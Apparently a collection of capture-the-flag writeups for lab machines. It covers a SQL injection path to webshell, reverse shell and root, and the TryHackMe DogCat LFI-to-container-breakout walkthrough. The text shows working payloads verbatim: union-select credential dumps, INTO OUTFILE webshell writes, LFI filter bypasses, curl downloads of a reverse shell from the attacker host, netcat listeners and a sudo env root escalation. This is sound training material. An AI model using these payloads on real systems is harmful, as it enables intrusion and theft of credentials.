44 | 45 | Payload: ' order by 10000-- - == **NO WORK** 46 | 47 | Payload: ' union select 1-- - == **NO WORK** 48 | 49 | **Country Field** 50 | 51 | Let's try to do this payloads with other field from request. 52 | 53 | Payload: ' union select 1-- - == **WORKS!!!!!** 54 | 55 | ![image](https://user-images.githubusercontent.com/79543461/177161840-7352bb95-c77b-451d-9b9f-8d3d785baed2.png) 56 | 57 | ![image](https://user-images.githubusercontent.com/79543461/177162100-a0e026a4-6b8d-4f35-b056-161b90c9238e.png) 58 | 59 | Let's go to enumerate Things. 60 | 61 | **Database** 62 | 63 | Payload: ' union select database()-- - 64 | 65 | ![image](https://user-images.githubusercontent.com/79543461/177163576-b903824d-3109-4143-b421-39d210096c0e.png) 66 | 67 | **Version** 68 | 69 | Payload: ' union select @@version-- - 70 | 71 | ![image](https://user-images.githubusercontent.com/79543461/177164063-41a93070-b0fc-4cfc-8592-f87ac3f97f96.png) 72 | 73 | **All DataBases** 74 | 75 | Payload: ' union select schema_name from information_schema.schemata 76 | 77 | ![image](https://user-images.githubusercontent.com/79543461/177171212-3efc9aa0-4291-4807-abf9-66885bfe0a08.png) 78 | 79 | **Tables Registration Database** 80 | 81 | Payload: ' union select table_name from information_schema.tables where table_schema="registration"-- - 82 | 83 | ![image](https://user-images.githubusercontent.com/79543461/177171583-48dca75b-e3f3-4a55-a860-3d5297fb0f45.png) 84 | 85 | Table name is the same than DataBase Name 86 | 87 | **Columns** 88 | 89 | Payload: ' union select column_name from information_schema.columns where table_schema="registration" and table_name="registration"-- - 90 | 91 | ![image](https://user-images.githubusercontent.com/79543461/177172114-948b0c56-5358-47d9-8328-fec1366e3086.png) 92 | 93 | **Users and Passwords** 94 | 95 | Payload: ' union select group_concat(username,0x3a,userhash) from registration-- - 96 | 97 | ![image](https://user-images.githubusercontent.com/79543461/177172762-289b5e1f-248c-4e39-994f-d6fd8a30c4ff.png) 98 | 99 | This users are my users... 100 | 101 | **RCE** 102 | 103 | Payload: ' union select "****" into outfile "/var/www/html/rce.php"-- - 104 | 105 | **Works!!** 106 | 107 | ![image](https://user-images.githubusercontent.com/79543461/177177136-7d1b27fa-3f5e-420b-9fb2-e048e02d502a.png) 108 | 109 | **Reverse Shell** 110 | 111 | I create in my Kali Machine a php script to gain reverse shell. 112 | 113 | I open http server wirth python3: python3 -m http.server 114 | 115 | In victim RCE: curl -o shell.php 10.10.14.33:8000/shell.php 116 | 117 | Now i put rlwrap nc -lnvp 1212 118 | 119 | I access to: http://10.10.11.116/shell.php 120 | 121 | **I HAVE SHELL!!** 122 | 123 | ![image](https://user-images.githubusercontent.com/79543461/177179263-e41c28fb-324e-4e7d-926b-8e39c4548d11.png) 124 | 125 | **user.txt** 126 | 127 | ![image](https://user-images.githubusercontent.com/79543461/177180144-1d77396f-ef0f-468b-95cb-6a7bc2c9e3a7.png) 128 | 129 | **Docker Container** 130 | 131 | ![image](https://user-images.githubusercontent.com/79543461/177180507-f5f4daf5-7dd3-46d8-b3ca-80eb00577e6e.png) 132 | 133 | Im in docker container but i found a credentials in /var/www/html/config.php 134 | 135 | ![image](https://user-images.githubusercontent.com/79543461/177180745-2ee9c296-3318-4717-ae22-c97fb8fff416.png) 136 | 137 | **SSH DON'T WORK** 138 | 139 | ![image](https://user-images.githubusercontent.com/79543461/177181115-1fc9620d-cb57-48a3-b954-ef3611b19b7d.png) 140 | 141 | su root its working 142 | 143 | ![image](https://user-images.githubusercontent.com/79543461/177182304-06ef859a-1a1e-4191-87cc-2a6e79256819.png) 144 | 145 | **DONE :)** 146 | 147 | **DEMO** 148 | https://youtu.be/f8WEvvKZM8s 149 | 150 | Thanks 151 | -------------------------------------------------------------------------------- /DogCat.md: -------------------------------------------------------------------------------- 1 | # DogCat TryHackMe 2 | 3 | **VIDEO WRITEUP** 4 | 5 | https://youtu.be/wnEVK7xIfcY 6 | 7 | **Enumeration** 8 | 9 | **Nmap:** 10 | 11 | ![image](https://user-images.githubusercontent.com/79543461/176386293-cbf1ba92-20aa-4012-9bca-efaeb883aaba.png) 12 | 13 | Seeing only SSH and HTTP open, it seems that it will be a web vulnerability 14 | 15 | **WhatWeb:** 16 | 17 | ![image](https://user-images.githubusercontent.com/79543461/176386911-cc73be86-9d60-4c08-8959-e0087ee3ff47.png) 18 | 19 | **Web with Browser:** 20 | 21 | ![image](https://user-images.githubusercontent.com/79543461/176389233-3105ec6b-e61a-4df5-bef0-8f3f5faecd19.png) 22 | 23 | **I click in dog and i see this:** 24 | 25 | ![image](https://user-images.githubusercontent.com/79543461/176389528-0e08f17b-3915-461e-a495-691a1ccf0ec5.png) 26 | 27 | **In URL i see "view" parameter, It looks like LFI, let's try basic payloads** 28 | 29 | ![image](https://user-images.githubusercontent.com/79543461/176389910-70dcc9e5-b0b6-423d-a29b-9a8ddcd61392.png) 30 | 31 | That message can mean two things. 32 | 33 | Or they have protected the LFI website, Or the devoloper added filters so that an LFI cannot be executed so easily 34 | 35 | **Payloads:** 36 | 37 | ../../../../etc/passwd = **No Work** 38 | 39 | ../../../../etc/passwd%00 = **No Work** 40 | 41 | %252e%252e%252fetc%252fpasswd = **No Work** 42 | 43 | %c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00 = **No Work** 44 | 45 | /%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd = **No Work** 46 | 47 | **Wrappers:** 48 | 49 | Let's try with LFI Wrappers: 50 | 51 | expect://whoami = **No Work** 52 | 53 | php://filter/convert.base64-encode/resource=index.php = **No work** 54 | 55 | Okey anything work, but i try to put cat or dog, it is possible that the filter checks if there is the word dog or cat. 56 | 57 | Payload: **dog/etc/passwd** 58 | 59 | ![image](https://user-images.githubusercontent.com/79543461/176392772-34d8dbd7-ab20-4949-bf3a-97a9e4aa33df.png) 60 | 61 | **That's It!!** 62 | 63 | Every time I click on cat or dog I get a different picture, that makes me think that it could be a php file that is executed. 64 | 65 | But looking at the source code it is very clear to me. 66 | 67 | Therefore, to check it is necessary to send a base64 filter in the wrapper and ask it to give me the page cat or dog. 68 | 69 | ![image](https://user-images.githubusercontent.com/79543461/176395381-0726391b-8cc3-49cd-a33c-561605793226.png) 70 | 71 | **WORKS!!! Lets go to Decode Base64 code** 72 | 73 | ![image](https://user-images.githubusercontent.com/79543461/176395536-b72fb120-52a8-4f4d-8e30-6a11189a9d90.png) 74 | 75 | Same with dogs file 76 | 77 | ![image](https://user-images.githubusercontent.com/79543461/176396151-bc86b5d4-77ca-42fb-90fc-6c2caf3b8ce7.png) 78 | 79 | **FFUF:** 80 | 81 | Web App are adding .php extension in all the querys. 82 | 83 | ![image](https://user-images.githubusercontent.com/79543461/176399811-07d12933-5306-449f-983e-19af0110bf6a.png) 84 | 85 | **Tryng Payloads I found the correct Payload** 86 | 87 | ![image](https://user-images.githubusercontent.com/79543461/176399237-64556068-edc0-4774-94dd-b5acfdc30d49.png) 88 | 89 | **Decoded base64 index.php code** 90 | 91 | ![image](https://user-images.githubusercontent.com/79543461/176399650-b30098b2-02ec-4371-8006-8f9c06107134.png) 92 | 93 | **Other FFUF** 94 | 95 | ![image](https://user-images.githubusercontent.com/79543461/176443978-851bd070-272b-47cb-9d54-cde62d16e1d5.png) 96 | 97 | **Flag** 98 | 99 | ![image](https://user-images.githubusercontent.com/79543461/176402871-df440e00-01e7-479e-9cac-10131e797a06.png) 100 | 101 | ![image](https://user-images.githubusercontent.com/79543461/176444149-15725303-a6ab-47dd-ba1a-6fab61e0277f.png) 102 | 103 | **Seeing index.php code• i see ext paramter expected in GET request.** 104 | 105 | http://10.10.64.213/?view=php://filter/convert.base64-encode/resource=dog/../flag&ext=.php == WORKS GOOD 106 | 107 | http://10.10.24.8/?view=php://filter/convert.base64-encode/resource=dog/../../../../&ext=etc/passwd == **WORKS GOOD!!!!!!!!** 108 | 109 | **/etc/passwd** 110 | 111 | ![image](https://user-images.githubusercontent.com/79543461/176447685-600e98e5-7d55-4958-9d1e-9e829096cef8.png) 112 | 113 | **With /etc/hosts i can see this: Is Docker Container** 114 | 115 | ![image](https://user-images.githubusercontent.com/79543461/176512462-a642fa4a-6c19-4a5b-b3f9-5c5f3c9fe1bb.png) 116 | 117 | **RCE** 118 | 119 | It's moment to upload to Remote Code Execution 120 | 121 | **With this command:** 122 | 123 | ![image](https://user-images.githubusercontent.com/79543461/176519831-2248462a-2123-4e21-9848-949560255509.png) 124 | 125 | **I have RCE but it's impossible convert to shell.** 126 | 127 | I need upload my php reverse shell. 128 | 129 | To upload i do the next steps 130 | 131 | **1.** Configure the PHP File 132 | 133 | ![image](https://user-images.githubusercontent.com/79543461/176541693-679fb2c9-3ad0-4053-9cc3-dbb07a6d087b.png) 134 | 135 | **2.** Active Python HTTP Server 136 | 137 | ![image](https://user-images.githubusercontent.com/79543461/176541858-9557c6d3-674d-4a00-b34b-0fc13d41d341.png) 138 | 139 | **3.** Download and Save shell with victim machine 140 | 141 | curl -o shell.php 10.8.222.251:8000/shell.php 142 | 143 | **4.** Activate your Listener 144 | 145 | ![image](https://user-images.githubusercontent.com/79543461/176542198-31dcaf95-6d56-4e5d-8b51-cdbf1b67a526.png) 146 | 147 | **5.** Open with browser Shell file 148 | 149 | http://10.10.223.232/shell.php 150 | 151 | And you have shell working 152 | 153 | **PrivEsc** 154 | 155 | sudo -l 156 | 157 | **ENV ROOT SHELL** 158 | 159 | I see this user can execute env command with sudo permisions 160 | 161 | **GTFOBINS** 162 | 163 | ![image](https://user-images.githubusercontent.com/79543461/176544171-8efbd861-0814-44ad-9424-3b59f630f5b8.png) 164 | 165 | sudo /usr/bin/env /bin/bash 166 | 167 | **Root Shell** 168 | 169 | ![image](https://user-images.githubusercontent.com/79543461/176544345-e977a6c5-008f-410c-8fea-64225dfd861a.png) 170 | 171 | 172 | **Flag 2 and 3** 173 | 174 | ![image](https://user-images.githubusercontent.com/79543461/176544642-ae2ae665-b29a-459d-8fed-d05b50dfd48d.png) 175 | 176 | **/opt/backups** 177 | 178 | I found this!! 179 | 180 | ![image](https://user-images.githubusercontent.com/79543461/176545146-16e666f2-ef11-4649-8aed-9608128cc450.png) 181 | 182 | ![image](https://user-images.githubusercontent.com/79543461/176545248-e5d9e4ee-d230-4cd0-9346-b91efd55be2d.png) 183 | 184 | tar -xvf backup.tar 185 | 186 | **BreakOut Container** 187 | 188 | ![image](https://user-images.githubusercontent.com/79543461/176548118-ced6fca2-69aa-4d33-856f-5514f1e829b8.png) 189 | 190 | ![image](https://user-images.githubusercontent.com/79543461/176548234-66df1fae-1520-405d-9066-e84f64087b89.png) 191 | 192 | ![image](https://user-images.githubusercontent.com/79543461/176548699-b5244b9b-9384-4875-b841-e0b425f7cc58.png) 193 | 194 | And Wait... 195 | 196 | ![image](https://user-images.githubusercontent.com/79543461/176549524-b1b13519-2a68-40f6-83f2-3da54cd6e954.png) 197 | 198 | **Root Flag** 199 | 200 | ![image](https://user-images.githubusercontent.com/79543461/176549617-962ea253-3cbc-4275-8d95-03a063dadbd3.png) 201 | 202 | DEMO: 203 | 204 | https://youtu.be/wnEVK7xIfcY 205 | 206 | Thanks! 207 | 208 | --------------------------------------------------------------------------------